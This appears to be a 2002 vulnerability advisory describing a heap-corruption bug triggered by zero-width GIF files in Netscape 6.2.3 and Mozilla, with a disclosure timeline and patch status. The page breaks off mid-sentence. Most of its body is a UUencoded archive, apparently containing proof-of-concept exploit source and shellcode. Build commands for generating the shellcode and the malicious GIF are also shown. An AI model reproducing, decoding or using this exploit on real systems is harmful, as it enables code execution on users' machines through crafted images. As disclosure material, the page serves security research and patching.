
Netscape zero width GIF buffer overflow
9th Sep 2002 [SBWID-5671]
COMMAND

	
		Mozilla/Netscape zero width GIF buffer overflow
	
	

SYSTEMS AFFECTED

	
		 Netscape 6.2.3

		 Mozilla 1.0?
	
	

PROBLEM

	
		zen-parse [zen-parse@gmx.net] says :
		

		A zero-width GIF file can cause exploitable heap corruption. (Or: "Why
		not to use a graphical browser")
		

		Vendor contacted:		17 Jul 2002

		Internally patched:		19 Jul 2002 (according to changelog)

		Received notification of patch: 29 Aug 2002 (via email)

		

		http://crash.ihug.co.nz/~Sneuro/zerogif/

		

		Contains an example exploit for malformed GIFs under Netscape 6.2.3.
		It also affects a number of other browsers, including Mozilla (of course),
		and manages to crash Opera.
		

		Example exploit (when it works properly) should create ~/.mashrc with  a
		sample replacement for ~/.bashrc.
		

		Certain values in 'generic.c' and possibly other files will need
		changing depending on library addresses.
		

		Comments in pngshellcode.c are related to another exploit  for  Netscape
		6.2.3... once I found one way to get data into known locations,  I  kept
		it.
		

		Certain utilities (pnmtopng and ppmtogif) called by these  programs  are
		in the netpbm-progs package.
		

		$ make pngshellcode; ./pngshellcode

		$ make create; ./create

		$ make generic; ./generic

		

		These commands will make the shellcode and the gif file.
		

		This exploit is extremely "Proof  of  Concept"  code.  Sorry  about  the
		system() calls.
		

		UUencoded archive :
		

		begin 644 how-it-works.tgz

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

		;F*BX1OJMT_.7]M)>VDO[G[5_`4]DH`P`*```

		`

		end

		2457 bytes

		
	
	

SOLUTION

	
		This issue is patched in Netscape 7.0 and in the latest version of Mozilla.
		

		There are a few other exploitable issues patched in Netscape 6.2.3
		relating to other image formats.
		

		I expect (hope for?) an advisory from Netscape at some  point  soon  for
	
